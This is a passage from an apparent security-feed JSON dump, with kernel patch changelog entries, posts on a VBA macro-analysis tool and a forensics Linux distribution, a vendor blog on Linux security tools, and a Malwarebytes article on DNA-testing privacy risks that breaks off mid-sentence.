rpm/constraints.in: build ARM on at least 2 cpus\n - rpm/constraints.in: Lower default disk space requirement from 25G to 24G\n 25G is rejected by the build service on ARM.\n - rtnl: limit IFLA_NUM_TX_QUEUES and IFLA_NUM_RX_QUEUES to 4096\n (bnc#1012382).\n - s390/chsc: Add exception handler for CHSC instruction (git-fixes).\n - s390/extmem: fix gcc 8 stringop-overflow warning (bnc#1012382).\n - s390/kdump: Fix elfcorehdr size calculation (git-fixes).\n - s390/kdump: Make elfcorehdr size calculation ABI compliant (git-fixes).\n - s390/mm: correct allocate_pgste proc_handler callback (git-fixes).\n - s390/qeth: do not dump past end of unknown HW header (bnc#1012382).\n - s390/qeth: handle failure on workqueue creation (git-fixes).\n - s390: revert ELF_ET_DYN_BASE base changes (git-fixes).\n - s390/stacktrace: fix address ranges for asynchronous and panic stack\n (git-fixes).\n - scsi: bnx2i: add error handling for ioremap_nocache (bnc#1012382).\n - scsi: ibmvscsi: Improve strings handling (bnc#1012382).\n - scsi: klist: Make it safe to use klists in atomic context (bnc#1012382).\n - scsi: target/iscsi: Make iscsit_ta_authentication() respect the output\n buffer size (bnc#1012382).\n - selftests/efivarfs: add required kernel configs (bnc#1012382).\n - serial: cpm_uart: return immediately from console poll (bnc#1012382).\n - serial: imx: restore handshaking irq for imx1 (bnc#1012382).\n - signal: Properly deliver SIGSEGV from x86 uprobes (bsc#1110006).\n - slub: make ->cpu_partial unsigned int (bnc#1012382).\n - smb2: fix missing files in root share directory listing (bnc#1012382).\n - smb3: fill in statfs fsid and correct namelen (bsc#1112905).\n - sound: enable interrupt after dma buffer initialization (bnc#1012382).\n - spi: rspi: Fix interrupted DMA transfers (bnc#1012382).\n - spi: rspi: Fix invalid SPI use during system suspend (bnc#1012382).\n - spi: sh-msiof: Fix handling of write value for SISTR register\n (bnc#1012382).\n - spi: sh-msiof: Fix invalid SPI use during system suspend (bnc#1012382).\n - spi: tegra20-slink: explicitly enable/disable clock (bnc#1012382).\n - staging: android: ashmem: Fix mmap size validation (bnc#1012382).\n - staging: rts5208: fix missing error check on call to rtsx_write_register\n (bnc#1012382).\n - stmmac: fix valid numbers of unicast filter entries (bnc#1012382).\n - target: log Data-Out timeouts as errors (bsc#1095805).\n - target: log NOP ping timeouts as errors (bsc#1095805).\n - target: split out helper for cxn timeout error stashing (bsc#1095805).\n - target: stash sess_err_stats on Data-Out timeout (bsc#1095805).\n - target: use ISCSI_IQN_LEN in iscsi_target_stat (bsc#1095805).\n - tcp: add tcp_ooo_try_coalesce() helper (bnc#1012382).\n - tcp: call tcp_drop() from tcp_data_queue_ofo() (bnc#1012382).\n - tcp: fix a stale ooo_last_skb after a replace (bnc#1012382).\n - tcp: free batches of packets in tcp_prune_ofo_queue() (bnc#1012382).\n - tcp: increment sk_drops for dropped rx packets (bnc#1012382).\n - tcp: use an RB tree for ooo receive queue (bnc#1012382).\n - team: Forbid enslaving team device to itself (bnc#1012382).\n - thermal: of-thermal: disable passive polling when thermal zone is\n disabled (bnc#1012382).\n - tools/vm/page-types.c: fix "defined but not used" warning (bnc#1012382).\n - tools/vm/slabinfo.c: fix sign-compare warning (bnc#1012382).\n - tpm: Restore functionality to xen vtpm driver (bsc#1020645, git-fixes).\n - tsl2550: fix lux1_input error in low light (bnc#1012382).\n - ubifs: Check for name being NULL while mounting (bnc#1012382).\n - ucma: fix a use-after-free in ucma_resolve_ip() (bnc#1012382).\n - USB: fix error handling in usb_driver_claim_interface() (bnc#1012382).\n - usb: gadget: fotg210-udc: Fix memory leak of fotg210->ep[i]\n (bnc#1012382).\n - usb: gadget: serial: fix oops when data rx'd after close (bnc#1012382).\n - USB: handle NULL config in usb_find_alt_setting() (bnc#1012382).\n - USB: remove LPM management from usb_driver_claim_interface()\n (bnc#1012382).\n - USB: serial: kobil_sct: fix modem-status error handling (bnc#1012382).\n - USB: serial: simple: add Motorola Tetra MTP6550 id (bnc#1012382).\n - USB: usbdevfs: restore warning for nonsensical flags (bnc#1012382).\n - USB: usbdevfs: sanitize flags more (bnc#1012382).\n - usb: wusbcore: security: cast sizeof to int for comparison (bnc#1012382).\n - USB: yurex: Check for truncation in yurex_read() (bnc#1012382).\n - Use make --output-sync feature when available (bsc#1012422). The mesages\n in make output can interleave making it impossible to extract warnings\n reliably. Since version 4 GNU Make supports --output-sync flag that\n prints output of each sub-command atomically preventing this issue.\n Detect the flag and use it if available. SLE11 has make 3.81 so it is\n required to include make 4 in the kernel OBS projects to take advantege\n of this.\n - Use upstream version of pci-hyperv change 35a88a18d7\n - uwb: hwa-rc: fix memory leak at probe (bnc#1012382).\n - vmci: type promotion bug in qp_host_get_user_memory() (bnc#1012382).\n - wlcore: Add missing PM call for wlcore_cmd_wait_for_event_or_timeout()\n (bnc#1012382).\n - wlcore: Fix memory leak in wlcore_cmd_wait_for_event_or_timeout\n (git-fixes).\n - x86/cpufeature: deduplicate X86_FEATURE_L1TF_PTEINV (kabi).\n - x86/entry/64: Add two more instruction suffixes (bnc#1012382).\n - x86/entry/64: Clear registers for exceptions/interrupts, to reduce\n speculation attack surface (bsc#1105931).\n - x86/entry/64: sanitize extra registers on syscall entry (bsc#1105931).\n - x86/fpu: Finish excising 'eagerfpu' (bnc#1012382).\n - x86/fpu: Remove second definition of fpu in __fpu__restore_sig()\n (bsc#1110006).\n - x86/fpu: Remove struct fpu::counter (bnc#1012382).\n - x86/fpu: Remove use_eager_fpu() (bnc#1012382).\n - x86/irq: implement irq_data_get_effective_affinity_mask() for v4.12\n (bsc#1109772).\n - x86/kexec: Correct KEXEC_BACKUP_SRC_END off-by-one error (bsc#1114648).\n - x86/numa_emulation: Fix emulated-to-physical node mapping (bnc#1012382).\n - x86/paravirt: Fix some warning messages (bnc#1065600).\n - x86/percpu: Fix this_cpu_read() (bsc#1110006).\n - x86,sched: Allow topologies where NUMA nodes share an LLC (bsc#1091158,\n bsc#1101555).\n - x86/spec_ctrl: Fix spec_ctrl reporting (bsc#1106913, bsc#1111516).\n - x86/speculation: Apply IBPB more strictly to avoid cross-process data\n leak (bsc#1106913).\n - x86/speculation: Enable cross-hyperthread spectre v2 STIBP mitigation\n (bsc#1106913).\n - x86/speculation: Propagate information about RSB filling mitigation to\n sysfs (bsc#1106913).\n - x86/time: Correct the attribute on jiffies' definition (bsc#1110006).\n - x86/tsc: Add missing header to tsc_msr.c (bnc#1012382).\n - xen: avoid crash in disable_hotplug_cpu (bnc#1012382 bsc#1106594\n bsc#1042422).\n - xen: fix GCC warning and remove duplicate EVTCHN_ROW/EVTCHN_COL usage\n (bnc#1012382).\n - xen/manage: do not complain about an empty value in control/sysrq node\n (bnc#1012382).\n - xhci: Add missing CAS workaround for Intel Sunrise Point xHCI\n (bnc#1012382).\n - xhci: Do not print a warning when setting link state for disabled ports\n (bnc#1012382).\n - rpm/kernel-binary.spec.in: Add missing export BRP_SIGN_FILES\n (bsc#1115587) The export line was accidentally dropped at merging\n scripts branch, which resulted in the invalid module signature.\n\n", "edition": 1, "reporter": "Suse", "published": "2018-11-20T21:08:45", "title": "Security update for the Linux Kernel (important)", "type": "suse", "enchantments": {"score": {"modified": "2018-11-21T01:33:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-10940", "CVE-2018-18690", "CVE-2018-18710", "CVE-2018-18281", "CVE-2018-18386", "CVE-2018-16658", "CVE-2018-9516"], "modified": "2018-11-20T21:08:45", "id": "OPENSUSE-SU-2018:3817-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00028.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2018-11-21T01:57:41", "references": ["https://github.com/MalwareCantFly/Vba2Graph"], "description": "A tool for security researchers, who waste their time analyzing malicious Office macros. \n\nGenerates a VBA call graph, with potential malicious keywords highlighted. \n\nAllows for quick [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of malicous macros, and easy understanding of the execution flow. \n\n[ @MalwareCantFly ](<https://twitter.com/MalwareCantFly>)\n\n \n** Features ** \n\n\n * Keyword highlighting \n * VBA Properties support \n * External function declarion support \n * Tricky macros with \"_Change\" execution triggers \n * Fancy color schemes! \n \n** Pros ** \n\n\n * Pretty fast \n * Works well on most malicious macros observed in the wild \n \n \n** Cons ** \n\n\n * Static (dynamicaly resolved calls would not be recognized) \n \n \n** Examples ** \nExample 1: \nTrickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers. \n \n\n\n[ ![](https://4.bp.blogspot.com/-hKYyEyR8B74/W8_spts6b7I/AAAAAAAANAI/KWgqGrATsZ8LbGx1Eb_sFcHj_LZQjUTxwCLcBGAs/s640/Vba2Graph_1.png) ](<https://4.bp.blogspot.com/-hKYyEyR8B74/W8_spts6b7I/AAAAAAAANAI/KWgqGrATsZ8LbGx1Eb_sFcHj_LZQjUTxwCLcBGAs/s1600/Vba2Graph_1.png>)\n\n \nExample 2: \n \n\n\n[ ![](https://2.bp.blogspot.com/-PV0mCqEYVc0/W8_sug35W-I/AAAAAAAANAM/7RD2CecUrwA2J-DcasKN4zquaYqQaBHbwCLcBGAs/s640/Vba2Graph_2.png) ](<https://2.bp.blogspot.com/-PV0mCqEYVc0/W8_sug35W-I/AAAAAAAANAM/7RD2CecUrwA2J-DcasKN4zquaYqQaBHbwCLcBGAs/s1600/Vba2Graph_2.png>)\n\n \nCheck out the _ Examples _ folder for more cases. \n \n** Installation ** \n \n** Install oletools: ** \n\n \n \n https://github.com/decalage2/oletools/wiki/Install\n\n \n** Install Python Requirements ** \n\n \n \n pip2 install -r requirements.txt\n\n \n** Install Graphviz ** \n \n** Windows ** \nInstall Graphviz msi: \n\n \n \n https://graphviz.gitlab.io/_pages/Download/Download_windows.html\n\nAdd \"dot.exe\" to PATH env variable or just: \n\n \n \n set PATH=%PATH%;C:\\Program Files (x86)\\Graphviz2.38\\bin\n\n \n** Mac ** \n\n \n \n brew install graphviz\n\n \n** Ubuntu ** \n\n \n \n sudo apt-get install graphviz\n\n \n** Arch ** \n\n \n \n sudo pacman -S graphviz\n\n \n** Usage ** \n\n \n \n usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)\n \n optional arguments:\n -h, --help show this help message and exit\n -o OUTPUT, --output OUTPUT\n output folder (default: \"output\")\n -c {0,1,2,3}, --colors {0,1,2,3}\n color scheme number [0, 1, 2, 3] (default: 0 - B&W)\n -i INPUT, --input INPUT\n olevba generated file or .bas file\n -f FILE, --file FILE Office file with macros\n\n \n** Usage Examples (All Platforms) ** \nOnly Python 2 is supported: \n\n \n \n # Generate call graph directly from an Office file with macros [tnx @doomedraven]\n python2 vba2graph.py -f malicious.doc -c 2 \n \n # Generate vba code using olevba then pipe it to vba2graph\n olevba malicious.doc | python2 vba2graph.py -c 1\n \n # Generate call graph from VBA code\n python2 vba2graph.py -i vba_code.bas -o output_folder\n\n \n** Output ** \nYou'll get 4 folders in your output folder: \n\n\n * ** png: ** the actual graph image you are looking for \n * ** svg: ** same graph image, just in vector graphics \n * ** dot: ** the dot file which was used to create the graph image \n * ** bas: ** the VBA functions code that was recognized by the script (for debugging) \n \n** Batch Processing ** \n \n** Mac/Linux: ** \n** batch.sh ** script file is attached for running _ olevba _ and _ vba2graph _ on an input folder of malicious docs. \nDeletes _ output _ dir. use with caution. \n \n \n\n\n** [ Download Vba2Graph ](<https://github.com/MalwareCantFly/Vba2Graph>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-11-20T21:11:08", "title": "Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents", "type": "kitploit", "enchantments": {"score": {"modified": "2018-11-21T01:57:41", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-11-20T21:11:08", "toolHref": "https://github.com/MalwareCantFly/Vba2Graph", "id": "KITPLOIT:8929996260488644784", "href": "http://www.kitploit.com/2018/11/vba2graph-generate-call-graphs-from-vba.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-19T15:53:46", "references": [], "description": "[ ![](https://1.bp.blogspot.com/-OfO0Uu6zd1I/W_Idj5vTI5I/AAAAAAAANOs/x2n0f6AVg-EgON_Lb8kZDw59RLdfa27OgCLcBGAs/s640/caine10.png) ](<https://1.bp.blogspot.com/-OfO0Uu6zd1I/W_Idj5vTI5I/AAAAAAAANOs/x2n0f6AVg-EgON_Lb8kZDw59RLdfa27OgCLcBGAs/s1600/caine10.png>)\n\n \n\n\n** CAINE ** (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project. Currently, the project manager is Nanni Bassetti (Bari - Italy). \n\nCAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface. \n\n \n\n\nThe main design objectives that CAINE aims to guarantee are the following: \n\n * an interoperable environment that supports the digital investigator during the four phases of the digital investigation \n * a user-friendly graphical interface \n * user-friendly tools \n\nCAINE represents fully the spirit of the Open Source philosophy because the project is completely open, everyone could take on the legacy of the previous developer or project manager. The distro is open source, the Windows side is freeware and, the last but not least, the distro is installable, thus giving the opportunity to rebuild it in a new brand version, so giving a long life to this project... \n\n \n\n\n[ ![](https://3.bp.blogspot.com/-sNy79D3b3Y4/W_IeG7oM9TI/AAAAAAAANO0/bbYSb4S-XlAAbx2CH3jicaTYyYD0h56JQCLcBGAs/s640/caine_menu10.png) ](<https://3.bp.blogspot.com/-sNy79D3b3Y4/W_IeG7oM9TI/AAAAAAAANO0/bbYSb4S-XlAAbx2CH3jicaTYyYD0h56JQCLcBGAs/s1600/caine_menu10.png>)\n\n \n** CHANGELOG CAINE 10.0 \"Infinity\" ** \n\n\n * Kernel 4.15.0-38 \n * Based on Ubuntu 18.04 64BIT - UEFI/SECURE BOOT Ready! \n * CAINE 10.0 can boot on Uefi/Uefi+secure boot/Legacy Bios/Bios. \nThe important news is CAINE 10.0 ** blocks all the block devices ** (e.g. ** /dev/sda ** ), in Read-Only mode. You can use a tool with a GUI named BlockON/OFF present on CAINE's Desktop. \nThis new write-blocking method assures all disks are really preserved from accidentally writing operations because they are locked in Read-Only mode. \nIf you need to write a disk, you can unlock it with BlockOn/Off or using \"Mounter\" changing the policy in writable mode. \n \nRead more [ here ](<https://www.caine-live.net/>) . \n \n\n\n** [ Download CAINE 10.0 ](<https://www.caine-live.net/page5/page5.html>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-11-19T12:39:10", "title": "CAINE 10.0 - GNU/Linux Live Distribution For Digital Forensics Project, Windows Side Forensics And Incident Response", "type": "kitploit", "enchantments": {"score": {"modified": "2018-11-19T15:53:46", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-11-19T12:39:10", "toolHref": "https://www.caine-live.net/page5/page5.html", "id": "KITPLOIT:1763255611231154262", "href": "http://www.kitploit.com/2018/11/caine-100-gnulinux-live-distribution.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2018-11-20T18:56:12", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_Carbon Black recently published a report on the challenges of securing Linux-based operating systems and how Carbon Black is redesigning the approach. For more information about how the Cb Predictive Security Cloud, Carbon Black's consolidated endpoint security platform, helps enterprises cut costs and realize significant business benefits, check out our webinar The Business Benefits and Cost Savings of Switching to the CB Predictive Security Cloud_.\n\n* * *\n\nWe can define our collective perception of what security is by investigating the questions we ask about the tools we use. To evaluate Windows security tools, two questions rise to the top:\n\n * Does this tool protect my system from viruses and other malware?\n * Does this tool support my version of Windows, now and in the future?\n\n \n\nThese certainly are important questions and highly valuable when assessing Windows security tools. When a tool designed to meet these criteria on Windows is ported to Linux and presented as an equivalent solution, we assume, often implicitly, that the questions we want answered are also equivalent. However, there are several flaws in using these questions to evaluate Linux security tools.\n\n * #### PROJECTING THE IMPORTANCE OF CHARACTERISTICS IN WINDOWS SOLUTIONS TO LINUX.\n\nThe primary question we need to ask to evaluate a tool for Windows is: Does this tool protect my system from viruses and other malware? The reason this question is important to answer for Windows machines is because we know viruses and malware are a significant threat for them. If malware is a significant threat to a system, it makes perfect sense to heavily weigh malware protection in a security solution. However, due to the nature of Linux machines being critical assets that don\u2019t regularly leave your environment, malware can be managed without the need for cumbersome tools . Malware certainly exists on Linux, but nowhere near the volume or variety as malware on Windows. \u2018Bad things\u2019 on Linux are almost exclusively fileless, meaning traditional solutions are ineffective and introduce unnecessary performance impact. By accepting a Windows security model on Linux, we implicitly weigh malware protection disproportionately high, even though we may know Linux malware is relatively scarce compared to Windows.\n\n * #### A SUFFICIENT ANSWER ON WINDOWS IS NOT NECESSARILY SUFFICIENT ON LINUX.\n\nOn Windows, we also want to ask: Does this tool support my version of Windows, now and in the future? This question can be answered sufficiently if the security tool releases updates at the same pace as a fairly small selection of Windows versions you might use, typically quarterly or semi-annually. This is a perfectly appropriate answer for Windows because the release schedule is regular and relatively infrequent. With a quarterly release schedule, the tool would almost always be up-to-date. This is not the case with Linux. There are many different distributions with wide variation and independent release schedules, some of which include new releases every night. Given the pace of Linux development, a quarterly or semi-annual release schedule would result in a security tool that is almost always out of date.\n\n * #### THE IMPACT OF SECURITY SCANS ARE NOT EQUAL ON WINDOWS AND LINUX.\n\nBy promoting the Windows approach to security on Linux, vendors are saying that the impact of running the tool on both environments is acceptable. On Windows, the effects of a security scan range from unnoticeable to somewhat bothersome. Typically, users on Windows desktops are not utilizing all of the machine\u2019s resources. A security scan can temporarily borrow some of the unused resources without significantly impacting the productivity of the user. However, Linux is not typically running on desktop machines. It\u2019s powering servers, which have likely been tuned and optimized to run mission-critical applications and workloads. On production servers, unused machine resources are a waste of money and most organizations will do everything they can to maximize resource utilization. With little-to-no unused resources, a security scan will encroach on resources already in use and result in degraded performance of those mission-critical applications. In a fileless world scans have no effect.\n\n \n\n![](/wp-content/uploads/2018/10/redesigning-linux-security-whitepaper-thumb\u2202.jpg)\n\nThe goals of this whitepaper are to bring light to the flaws with porting Windows security approaches to Linux, identify unique challenges with securing Linux infrastructure, introduce a list of questions one can use to better evaluate a Linux security offering, and propose a core set of design principles on which strong Linux security offerings can be built.\n\nRead Now\n\n* * *\n\n_Thanks for joining us as we explore \"Re-designing Linux Security: Do No Harm\" our report on the challenges of securing Linux-based operating systems in the modern era. Join us next week as we continue to profile this report._\n\nThe post [Flaws in Evaluating Security Tools for Linux](<https://www.carbonblack.com/2018/11/20/flaws-in-evaluating-security-tools-for-linux/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "reporter": "Katharine Laird", "published": "2018-11-20T18:00:32", "type": "carbonblack", "title": "Flaws in Evaluating Security Tools for Linux", "enchantments": {"score": {"modified": "2018-11-20T18:56:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-11-20T18:00:32", "id": "CARBONBLACK:11B3955FD124907FA698669CEFE466A2", "href": "https://www.carbonblack.com/2018/11/20/flaws-in-evaluating-security-tools-for-linux/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-11-20T22:54:43", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "Sarah* hovered over the mailbox, envelope in hand. She knew as soon as she mailed off her DNA sample, there\u2019d be no turning back. She ran through the information she looked up on 23andMe\u2019s website one more time: the privacy policy, the research parameters, the option to learn about potential health risks, the warning that the findings could have a dramatic impact on her life.\n\nShe paused, instinctively retracting her arm from the mailbox opening. Would she live to regret this choice? What could she learn about her family, herself that she may not want to know? How safe did she really feel giving her genetic information away to be studied, shared with others, or even experimented with?\n\nThinking back to her sign-up experience, Sarah suddenly worried about the massive amount of personally identifiable information she already handed over to the company. With a background in IT, she knew what a juicy target hers and other customers\u2019 data would be for a potential hacker. Realistically, how safe was her data from a potential breach? She tried to recall the specifics of the EULA, but the wall of legalese text melted before her memory.\n\nPivoting on her heel, Sarah began to turn away from the mailbox when she remembered just why she wanted to sign up for genetic testing in the first place. She was compelled to learn about her own health history after finding out she had a rare genetic disorder, Ehlers-Danlos syndrome, and wanted to present her DNA for the purpose of further research. In addition, she was on a mission to find her mother\u2019s father. She had a vague idea of who he was, but no clue how to track him down, and believed DNA testing could lead her in the right direction.\n\nSarah closed her eyes and pictured her mother\u2019s face when she told her she found her dad. With renewed conviction, she dropped the envelope in the mailbox. It was done.\n\n*_Not her real name. Subject asked that her name be changed to protect her anonymity._\n\n### An informed decision\n\nWhat if Sarah were you? Would you be inclined to test your DNA to find out about your heritage, your potential health risks, or discover long lost family members? Would you want to submit a sample of genetic material for the purpose of testing and research? Would you care to have a trove of personal data stored in a large database alongside millions of other customers? And would you worry about what could be done with that data and genetic sample, both legally and illegally?\n\nPerhaps your curiosity is powerful enough to sign up without thinking through the consequences. But this would be a dire mistake. Sarah spent a long time weighing the pros and cons of her situation, and ultimately made an informed decision about what to do with her data. But even she was missing parts of the puzzle before taking the plunge. DNA testing is so commonplace now that we\u2019re blindly participating without truly understanding the implications.\n\nAnd there are many. From privacy concerns to law enforcement controversies to life insurance accessibility to employment discrimination, red flags abound. And yet, this fledgling industry shows no signs of stopping. As of 2017, an estimated [12 million people](<https://www.technologyreview.com/s/610233/2017-was-the-year-consumer-dna-testing-blew-up/>) have had their DNA analyzed through at-home genealogy tests. Want to venture a guess at how many of those read through the [21-page privacy policy](<https://www.23andme.com/about/privacy/>) to understand exactly how their data is being used, shared, and protected?\n\nNowadays, security and privacy cannot be assumed. Between hacks of major social media companies and underhanded sharing of data with third parties, there are ways that companies are both negligent of the dangers of storing data without following best security practices and complicit in the dissemination of data to those willing to pay\u2014whether that\u2019s in the name of research or not.\n\nSo I decided to dig into exactly what these at-home DNA testing kit companies are doing to protect their customers\u2019 most precious data, since you can\u2019t get much more personally identifiable than a DNA sample. How seriously are these organizations taking the security of their data? What is being done to secure these massive databases of DNA and other PII? How transparent are these companies with their customers about what\u2019s being done with their data?\n\nThere\u2019s a lot to unpack with commercial DNA testing\u2014often pages and pages of documents to sift through regarding privacy, security, and design. It can be mind-numbingly difficult to process, which is why so many customers just breeze through agreements and click \u201cOkay\u201d without really thinking about what they\u2019re purchasing.\n\nBut this isn\u2019t some app on your phone or software on your computer. It\u2019s data that could be potentially life-changing. Data that, if misinterpreted, could send people into an emotional tailspin, or worse, a false sense of security. And it\u2019s data that, in the wrong hands, could be used for devastating purposes.\n\nIn an effort to better educate users about the pros and cons of participating in at-home DNA testing, I\u2019m going to peel back the layers so customers can see for themselves, as clearly as possible, the areas of concern, as well as the benefits of using this technology. That way, users can make informed choices about their DNA and related data, information that we believe should not be taken or given away lightly.\n\nThat way, when it\u2019s your turn to stand in front of the mailbox, you won\u2019t be second-guessing your decision.\n\n### Area of concern: life insurance\n\nOnly a few years ago in the United States, health insurance companies could deny applicants coverage based on pre-existing conditions. While this is thankfully no longer the case, life insurance companies can be more selective about who they cover and how much they charge.\n\nAccording to the American Counsel for Life Insurers (ACLI), a life insurance company may ask an applicant for any relevant information about his health\u2014and that includes the results of a genetic test, if one was taken. Any indication of health risk could factor into the price tag of coverage here in the United States.\n\nOf course, there\u2019s nothing that forces an individual to disclose that information when applying for life insurance. But the industry relies on honest communication from its customers in order to effectively price policies.\n\n\u201cThe basis of sound underwriting has always been the sharing of information between the applicant and the insurer\u2014and that remains today,\u201d said Dr. Robert Gleeson, consultant for the ACLI. \u201cIt only makes sense for companies to know what the applicant knows. There must be a level playing field.\u201d\n\nThe ACLI believes that the introduction of genetic testing can actually help life insurers better determine risk classification, enabling them to offer overall lower premiums for consumers. However, the fact remains: If a patience receives a diagnosis or if genetic testing reveals a high risk for a particular disease, their insurance premiums go up.\n\n[In Australia](<https://theconversation.com/australians-can-be-denied-life-insurance-based-on-genetic-test-results-and-there-is-little-protection-81335>), any genetic results deemed a health risk can result in not only increased premiums but denial of coverage altogether. And if you thought Australians could get away with a little white lie of omission when applying for life insurance, they are bound by law to disclose any known genetic test results, including those from at-home DNA testing kits.\n\n### Area of concern: employment\n\nGoing back as far as 1964 to [Title VII](<https://www.eeoc.gov/laws/statutes/titlevii.cfm>) of the Civil Rights Act, employers cannot discriminate based on race, color, religion, sex, or nationality. Workers with disabilities or other health conditions are protected by the Americans with Disabilities Act, the Rehab Act, and the Family and Medical Leave Act (FMLA).\n\nBut these regulations only apply to employees or candidates with a demonstrated health condition or disability. What if genetic tests reveal the _potential _for disability or health concern? For that, we have GINA.\n\nThe [Genetic Information Nondiscrimination Act](<https://www.eeoc.gov/laws/types/genetic.cfm>) (GINA) prohibits the use of genetic information in making employment decisions.\n\n\"Genetic information is protected under GINA, and cannot be considered unless it relates to a legitimate safety-sensitive job function,\" said John Jernigan, People and Culture Operations Director at Malwarebytes.\n\nSo that\u2019s what the law says. What happens in reality might be a different story. Unfortunately, it\u2019s popular practice for individuals to share their genetic results online, especially on social media. In fact, 23andMe has even sponsored celebrities unveiling and sharing their results. Surely no one will see videos of stars like Mayim Bialik sharing their 23andMe results live and follow suit.\n\nThe hiring process is incredibly subjective. It would be almost impossible to point the finger at any employer and say, \u201cYou didn\u2019t hire me because of the screenshot I shared on Facebook of my 23andMe results!\u201d It could be entirely possible that the candidate was discriminated against, but in court, any he said/she said arguments will benefit the employer and not the employee.\n\nOur advice: steer clear of sharing the results, especially any screenshots, on social media. You never know how someone could use that information against you.\n\n### Area of concern: personally identifiable information (PII)\n\nConsumer DNA tests are clearly best known for collecting and analyzing DNA. However just as important\u2014arguably more so to their bottom line\u2014is the personally identifiable information they collect from their customers at various points in their relationship. Organizations are absorbing as much as they can about their customers in the name of research, yes, but also in the name of profit.\n\nWhat exactly do these companies ask for? Besides the actual DNA sample, they collect and store content from the moment of registration, including your name, credit card, address, email, username and password, and payment methods. But that\u2019s just the tip of the iceberg.\n\nAlong with the genetic and registration data, 23andMe also curates self-reported content through a hulking, 45-minute long survey delivered to its customers. This includes asking about disease conditions, medical and family history, personal traits, and ethnicity. 23andMe also tracks your web behavior via cookies, and stores your IP address, browser preference, and which pages you click on. Finally, any data you produce or share on its website, such as text, music, audio, video, images, and messages to other members, belongs to 23andMe. Getting uncomfortable yet? These are hugely attractive targets for cybercriminals.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/11/questionnaire-600x333.png)\n\nSurvey questions gather loads of sensitive PII.\n\nOh, but there\u2019s more. Companies such as Ancestry or Helix have ways to keep their customers consistently involved with their data on their sites. They\u2019ll send customers a message saying, \u201cYou disclosed to us you had allergies. We\u2019re doing this study on allergies\u2014can you answer these questions?\u201d And thus even more information is gathered.\n\nTaking a closer look at the companies' EULAs, you\u2019ll discover that PII can also be gathered from social media, including any likes, tweets, pins, or follow links, as well as any profile information from Facebook if you use it to log into their web portals.\n\nBut the information-gathering doesn\u2019t stop there. Ancestry and others will also search public and historical records, such as newspaper mentions, birth, death, and marriage records related to you. In addition, Ancestry cites a frustratingly vague \u201cinformation collected from third parties\u201d bullet point in their privacy policy. Make of that what you will.\n\nSpeaking of third parties, many of them will get a good glimpse of who you are thanks to policies that allow for commercial DNA testing companies to market new products offers from business partners, including producing targeted ads personalized to users based on their interests. And finally, according to the privacy policy shared among many of these sites, DNA testing companies can and do sell your aggregate information to third parties \u201cin order to perform business development, initiate research, send you marketing emails, and improve our services.\u201d\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/11/emails-600x336.png)\n\nThat's a lot of marketing emails.\n\nOne such partner who benefits from the sharing of aggregate information is [Big Pharma](<https://motherboard.vice.com/en_us/article/xwkaz3/23andme-sold-access-to-your-dna-library-to-big-pharma-but-you-can-opt-out>): at-home DNA testing kits profit by selling user data to pharmaceutical companies for development of new drugs. For some, this might constitute crossing the line; for others, it represents being able to help researchers and those suffering from disease with their data.\n\n\u201cYou have to trust all their affiliates, all their employees, all the people that could purchase the company,\u201d said Sarah, our IT girl who elected to participate in 23andMe\u2019s research. \u201cIt\u2019s better to take the mindset that there\u2019s potential that any time this could be seen and accessed by anyone. You should always be willing to accept that risk.\u201d\n\nSadly, there\u2019s already more than enough reason to assume any of this information could be stolen\u2014because it has.\n\nIn June 2018, [MyHeritage announced](<o%09https:/www.reuters.com/article/us-myheritage-privacy/security-breach-at-myheritage-website-leaks-details-of-over-92-million-users-idUSKCN1J1308>) that the data of over 92 million users was leaked from the company\u2019s website in October the previous year. Emails and hashed passwords were stolen\u2014thankfully, the DNA and other data of customers was safe. Prior to that, the emails and passwords of 300,000 users from Ancestry.com were stolen back in 2015.\n\nBut as these databases grow and more information is gathered on individuals, the mark only becomes juicier for threat actors. \u201cThey want to create as broad a profile of the target as possible, not just of the individual but of their associates,\u201d said security expert and founder of [Have I Been Pwned](<https://haveibeenpwned.com/>) Troy Hunt, who tipped off Ancestry about their breach. \u201cIf I know who someone\u2019s mother, father, sister, and descendants might be, imagine how convincing a phishing email I could create. Imagine how I could fool your bank.\u201d\n\nCybercriminals can weaponize data not only to resell to third parties but for blackmail and extortion purposes. Through breaching this data, criminals could dangle coveted genetic, health, and ancestral discoveries in front of their victims. _You\u2019ve got a sibling\u2014send money here and we\u2019ll show you who. You\u2019re pre-dispositioned to a disease, but we won't tell you which one until you send Bitcoin here._ Years later, the Ashley Madison breach is still being exploited in this way.\n\n### Doing it right: data stored safely and separately\n\nWith so much sensitive data being collected by DNA testing companies, especially content related to health, one would hope these organizations pay special attention to securing it. In this area, I was pleasantly surprised to learn that several of the top consumer DNA tests banded together to create a robust security policy that aims to protect user data according to best practices.\n\nAnd what are those practices? For starters, DNA testing kit companies store user PII and genetic data in physically separating computing environments, and encrypt the data at rest and in transit. PII is assigned a 